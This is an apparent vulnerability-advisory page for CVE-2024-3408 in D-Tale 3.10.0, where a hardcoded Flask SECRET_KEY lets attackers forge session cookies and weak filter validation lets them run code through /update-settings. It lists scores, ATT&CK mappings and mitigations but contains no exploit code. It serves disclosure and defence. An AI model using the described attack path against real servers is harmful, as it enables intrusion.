CVE-2024-3408
Published: 06 June 2024
Summary
CVE-2024-3408 is a critical-severity Use of Hard-coded Credentials (CWE-798) vulnerability in Man D-Tale. Its CVSS base score is 9.8 (Critical).
Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked in the top 0.3% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.
This vulnerability is AI-related — categorised as Data Processing Libraries; in the Other ATLAS/OWASP Terms risk domain.
Deeper analysis
man-group/dtale version 3.10.0 contains an authentication bypass and remote code execution vulnerability stemming from a hardcoded SECRET_KEY in its Flask configuration combined with insufficient input validation on custom filter queries. The flaw permits forged session cookies when authentication is enabled and allows arbitrary code execution via the /update-settings endpoint regardless of the enable_custom_filters setting. The issue is tracked under CWE-798 and CWE-94 with a CVSS 3.1 score of 9.8.
An unauthenticated remote attacker can exploit the hardcoded key to impersonate a valid session and then submit crafted filter payloads that bypass intended restrictions, resulting in arbitrary code execution on the server with full confidentiality, integrity, and availability impact.
The referenced commit 32bd6fb4a63de779ff1e51823a456865ea3cbd13 in the dtale repository addresses the input-validation and session-handling weaknesses, while the associated huntr.dev bounty report details the original discovery and reproduction steps for defenders validating patches.
The EPSS score remains elevated near 0.92 with negligible movement between current and peak values.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2024-0050
Vulnerability details
man-group/dtale version 3.10.0 is vulnerable to an authentication bypass and remote code execution (RCE) due to improper input validation. The vulnerability arises from a hardcoded `SECRET_KEY` in the flask configuration, allowing attackers to forge a session cookie if authentication is…
more
enabled. Additionally, the application fails to properly restrict custom filter queries, enabling attackers to execute arbitrary code on the server by bypassing the restriction on the `/update-settings` endpoint, even when `enable_custom_filters` is not enabled. This vulnerability allows attackers to bypass authentication mechanisms and execute remote code on the server.
- CWE(s)
AI Security AnalysisAI
- AI Category
- Data Processing Libraries
- Risk Domain
- Other ATLAS/OWASP Terms
- OWASP Top 10 for LLMs 2025
- None mapped
- Classification Reason
- D-Tale (dtale) is an interactive web-based data exploration and visualization tool built on Pandas, commonly used in data science and ML workflows for data processing, making it a data processing library in the AI/ML context. Flagged on an AI/ML bug bounty platform (Huntr).
Related Threats
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
Hardcoded SECRET_KEY allows forging session cookies to bypass authentication (T1606.001). Improper input validation enables unauthenticated remote code execution via the /update-settings endpoint (T1190).
Affected Assets
Mitigating Controls
Likely Mitigating Controls AI
Per-CVE control mapping for this CVE has not run yet; the list below is derived from the weakness types (CWEs) cited in the NVD entry.
Enables users to notice when hard-coded credentials have been exploited for unauthorized access.
Security training explicitly warns against hard-coded credentials, lowering their use in systems.
Policy and procedures prohibit hard-coded credentials in favor of managed authentication.
External identity providers eliminate the need for hard-coded credentials in applications.
Changing default authenticators prior to first use and protecting content prevents use of hard-coded credentials.
Central credential stores and rotation policies remove the need for hard-coded credentials in configuration files or code.
Intelligence programs surface reports of campaigns that abuse hard-coded credentials in products, prompting removal or replacement and thereby reducing successful exploitation.
Planned investment enables secure credential storage and management systems instead of hard-coded credentials.